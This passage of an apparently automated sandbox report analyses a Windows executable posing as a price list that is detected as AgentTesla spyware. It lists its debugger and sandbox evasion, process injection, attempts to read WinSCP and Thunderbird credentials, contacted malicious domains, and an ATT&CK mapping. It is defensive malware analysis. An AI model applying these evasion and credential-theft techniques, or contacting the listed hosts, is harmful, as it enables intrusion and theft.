                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Window / User API: threadDelayed 1389
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Window / User API: threadDelayed 8463
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 7028, Thread sleep count: 385 > 30
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 7028, Thread sleep count: 2952 > 30
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6880, Thread sleep time: -18446744073709540s >= -30000s
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6920, Thread sleep count: 1389 > 30
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe TID: 6920, Thread sleep count: 8463 > 30
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmp, Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603913545.0000000001015000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                  Source: WerFault.exe, 0000000B.00000002.416819094.0000000004944000.00000004.00000001.sdmp, Binary or memory string: Hyper-V RAW
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmp, Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmp, Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380633022.0000000000C40000.00000004.00000020.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmp, WerFault.exe, 0000000B.00000002.417000819.0000000004C40000.00000002.00000001.sdmp, Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Process information queried: ProcessInformation

                  Anti Debugging:

                  Contains functionality to hide a thread from the debugger
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Code function: 0_2_027DA0D0 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,00000000 0_2_027DA0D0
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Thread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Process queried: DebugPort
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe, Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Memory written: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Process created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                  Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmp; Binary or memory string: Shell_TrayWnd
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmp; Binary or memory string: Progman
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmp; Binary or memory string: &Program Manager
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604422396.0000000001530000.00000002.00000001.sdmp; Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information:

                  Yara detected AgentTesla
                  Source: Yara match; File source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 7024, type: MEMORY
                  Source: Yara match; File source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpack, type: UNPACKEDPE
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Tries to steal Mail credentials (via file access)
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe; File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: Yara match; File source: 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY

                  Remote Access Functionality:

                  Yara detected AgentTesla
                  Source: Yara match; File source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 1508, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: PRICE LIST (NOVEMBER 2020).exe PID: 7024, type: MEMORY
                  Source: Yara match; File source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0.2.PRICE LIST (NOVEMBER 2020).exe.6835558.11.unpack, type: UNPACKEDPE

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 25 | Input Capture 1 | Security Software Discovery 331 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | Credentials in Registry 1 | Virtualization/Sandbox Evasion 25 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 2 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp 1 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery 113 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  PRICE LIST (NOVEMBER 2020).exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
                  PRICE LIST (NOVEMBER 2020).exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  8.2.PRICE LIST (NOVEMBER 2020).exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

                  Domains

                  Source | Detection | Scanner | Label
                  coroloboxorozor.com | 0% | Virustotal |

                  URLs

                  Source | Detection | Scanner | Label
                  http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                  http://CMvIqY.com | 0% | Avira URL Cloud | safe
                  http://DynDns.comDynDNS | 0% | URL Reputation | safe
                  http://cps.letsencrypt.org0 | 0% | URL Reputation | safe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                  http://coroloboxorozor.com | 0% | Avira URL Cloud | safe
                  https://api.ipify.org%$ | 0% | Avira URL Cloud | safe
                  http://r3.i.lencr.org/05 | 0% | Avira URL Cloud | safe
                  http://r3.o.lencr.org0 | 0% | URL Reputation | safe
                  http://L2JzF7P98hlnK.net | 0% | Avira URL Cloud | safe
                  https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
                  http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html | 0% | Avira URL Cloud | safe
                  http://mail.electrobelarmino.pt | 0% | Avira URL Cloud | safe
                  https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
                  http://cps.root-x1.letsencrypt.org0 | 0% | URL Reputation | safe

                  Domains and IPs

                  Contacted Domains

                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  coroloboxorozor.com | 104.21.71.230 | true | false | | unknown
                  mail.electrobelarmino.pt | 109.71.43.243 | true | true | | unknown

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    http://L2JzF7P98hlnK.net | true | Avira URL Cloud: safe | unknown
                    http://coroloboxorozor.com/base/FBD1AA88F2DB3E5E79F7212492E97FE4.html | false | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                                                Contacted IPs

                                                Public

                                                IP | Domain | Country | ASN | ASN Name | Malicious
                                                104.21.71.230 | unknown | United States | 13335 | CLOUDFLARENETUS | false

                                                General Information

                                                Joe Sandbox Version: 31.0.0 Emerald
                                                Analysis ID: 356549
                                                Start date: 23.02.2021
                                                Start time: 09:57:18
                                                Joe Sandbox Product: CloudBasic
                                                Overall analysis duration: 0h 9m 9s
                                                Hypervisor based Inspection enabled: false
                                                Report type: full
                                                Sample file name: PRICE LIST (NOVEMBER 2020).exe
                                                Cookbook file name: default.jbs
                                                Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed: 30
                                                Number of new started drivers analysed: 0
                                                Number of existing processes analysed: 0
                                                Number of existing drivers analysed: 0
                                                Number of injected processes analysed: 0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode: default
                                                Analysis stop reason: Timeout
                                                Detection: MAL
                                                Classification: mal100.troj.spyw.evad.winEXE@9/4@2/1
                                                EGA Information: Failed
                                                HDC Information:
                                                • Successful, ratio: 0% (good quality ratio 0%)
                                                • Quality average: 0%
                                                • Quality standard deviation: 0%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 52
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 184.30.21.219, 204.79.197.200, 13.107.21.200, 51.104.139.180, 104.42.151.234, 92.122.145.220, 104.43.139.144, 13.88.21.125, 52.255.188.83, 2.20.142.209, 2.20.142.210, 51.103.5.186, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 104.43.193.48, 184.30.20.56, 51.11.168.160
                                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                Simulations

                                                Behavior and APIs

                                                Time | Type | Description
                                                09:58:49 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                09:58:49 | API Interceptor | 587x Sleep call for process: PRICE LIST (NOVEMBER 2020).exe modified

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains


                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PRICE LIST (NOVE_2669e49e9dcb5c7f076336b8bf762a6b5e1646_915b61a4_1a53eef2\Report.wer
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):15584
                                                Entropy (8bit):3.7777374596954356
                                                Encrypted:false
                                                SSDEEP:96:MqMJbRQMvSklnLWMlHHxpLUpXINSm+BHUHZ0ownOgtYsH5Ef5BAKcp2OyPnr3sbh:34b1mPaKsUAeZiN/u7snS274Itk/
                                                MD5:6D2C097DF4D3059EC092A091C97A3831
                                                SHA1:82DC0B4978968722A56BD814F3A4CCFDBC5ABDBC
                                                SHA-256:789338BB58CA739D236920017EEB239D7693FE12B36A1C2ABF5872DC04CF5FA7
                                                SHA-512:3C811B676C510EEFA6F9D0282A301B0431552AE1469167B4EB719ECAEAD6B5BD0B8A1C79D6D34D5ED8A8B79FB2603C4EA050782392A32029AE808AA306F304C0
                                                Malicious:false
                                                Reputation:low
                                                Preview: Version=1..EventType=CLR20r3..EventTime=132585767156527719..ReportType=2..Consent=1..UploadTime=132585767269027132..ReportStatus=268566528..ReportIdentifier=8ae7535f-d4f5-412b-89a3-f13e0a3b37e9..IntegratorReportIdentifier=389ead0d-61aa-49fe-8cd8-e9fbf7b71726..Wow64Host=34404..Wow64Guest=332..NsAppName=PRICE LIST (NOVEMBER 2020).exe..AppSessionGuid=00001b70-0001-0017-5072-71720d0ad701..TargetAppId=W:0006599e7338a6f178ca570743e9573a50cf00000904!00000ecf315e5a72a3c9ddd386d1116d2265877b4027!PRICE L
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99A.tmp.dmp
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 17:58:38 2021, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):194948
                                                Entropy (8bit):4.467474118310582
                                                Encrypted:false
                                                SSDEEP:3072:20KUCgUmhoiVwtjQ0sATjd+p7p92zfzNB9gIOgF57Cd:2fTjspV105MpVgB9RpD7W
                                                MD5:5A4D0CDF07AE72AC9AB0EB3F74AB08A5
                                                SHA1:E7BF0A16C1871642760E1288C3A1CAD3190AB907
                                                SHA-256:9DBF9E4F9CBBBE087D8E067B1FC56F9161FC6CEF3AE3EE145A31DDAB0C723084
                                                SHA-512:4380BD72D9B6C9632B32CC93F552740A0F493D3D054A29CF25658C2627593D693CB8C57A866E2CDCB1A0873D6151C199C456DE501DB7E8953B9BDE3B3E482B1E
                                                Malicious:false
                                                Reputation:low
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERC7A4.tmp.WERInternalMetadata.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8076
                                                Entropy (8bit):3.707798630191834
                                                Encrypted:false
                                                SSDEEP:192:Rrl7r3GLNiE46ym6YJASUO9WAgmfZ2SpCprw89bpxsfZjm:RrlsNiT6j6Y+SUO9JgmfESMpqfQ
                                                MD5:6AF5FDF92E90A0C83292F3C9D33FCC05
                                                SHA1:B9F910EF08C96184C3575D7B5D5D1720AA8A82B4
                                                SHA-256:1B82C513BEAB7C25CA1478BAEFBA5AB27DB831D78798BC83A3F889774030C1ED
                                                SHA-512:DCAB9849C6FD364E9F9C06F3DD3D7EC86C559AD983844813EC784C7F753BD4DF104331D5EDE0C73131F4FE9F0F6CE868F35969EAE58159EB68F8E76E88C16630
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>..<OSVersionInformation>..<WindowsNTVersion>10.0</WindowsNTVersion>..<Build>17134</Build>..<Product>(0x30): Windows 10 Pro</Product>..<Edition>Professional</Edition>..<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>..<Revision>1</Revision>..<Flavor>Multiprocessor Free</Flavor>..<Architecture>X64</Architecture>..<LCID>1033</LCID>..</OSVersionInformation>..<ProcessInformation>..<Pid>7024</Pid>..
                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERCBCC.tmp.xml
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4768
                                                Entropy (8bit):4.536018555521011
                                                Encrypted:false
                                                SSDEEP:48:cvIwSD8zs/8JgtWI9B7hWSC8B38fm8M4JwulxFFL+q8v5xBUWGH91Lq189d:uITfS+MSNKJwGKyWGHLLyKd
                                                MD5:029B30A5F5B15B8ECB55D6067F686CC3
                                                SHA1:B77A0EC03763101D48BAA1D73F9F9CB555417C05
                                                SHA-256:A7A63DF05F192787C5408AADEFD4C98215256A235F3124C90289BBA4541089C4
                                                SHA-512:1F7FB135BDC6A00882E20BEEF95B43CED5F3559B78BC375B6C4C1C71C9E9F557D9043AC8A9A371512201F6AE88C9AFE51D7BF6595616EADECCCEFBCB39E44899
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="874269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):6.9085274554917975
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:PRICE LIST (NOVEMBER 2020).exe
                                                File size:32624
                                                MD5:404ef05a6acc67c2b59189171f9eb0fc
                                                SHA1:0ecf315e5a72a3c9ddd386d1116d2265877b4027
                                                SHA256:863d464bb43bda7378c611a5c16410a3c279ca72e447632f5e03f8418f5464d8
                                                SHA512:19ea2b67ef1661bcb5c2bb9640970ad8f3c734958853cd98045eb79b833d3b3bbfa0af59b1cf49e7175e9fa0d3dc3d4dfe75ce97fb6053b6f94d18510a296c0a
                                                SSDEEP:768:SxBXcbNpmqXnAfyjpX999Z99DfjAw4mTkrkEkeDhSa:SzuDp999Z99/d4mwIhE

                                                File Icon

                                                Icon Hash:00828e8e8686b000

                                                Static PE Info

                                                General

                                                Entrypoint:0x407e5e
                                                Entrypoint Section:.text
                                                Digitally signed:true
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:v4.0.30319
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                Authenticode Signature

                                                Signature Valid:false
                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                Error Number:-2146762487
                                                Not Before, Not After
                                                • 2/22/2021 2:31:55 PM 2/22/2022 2:31:55 PM
                                                Version:3
                                                Thumbprint MD5:838681B16D3D15D936CB197B5FF933E2
                                                Thumbprint SHA-1:979E9C65EF22267B08E05993E729B4436ABFA30A
                                                Thumbprint SHA-256:296F5CC2F7998028F80027C03F4B399B538AC67666FEE8B7152E7336B0487D44
                                                Serial:00DFB81554F129BEF797D45ACC5896E37F

                                                Entrypoint Preview

                                                Instruction
                                                jmp dword ptr [00402000h]
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al
                                                add byte ptr [eax], al

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7e0c           0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x8000           0x3e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x6800           0x1770
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xa000           0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

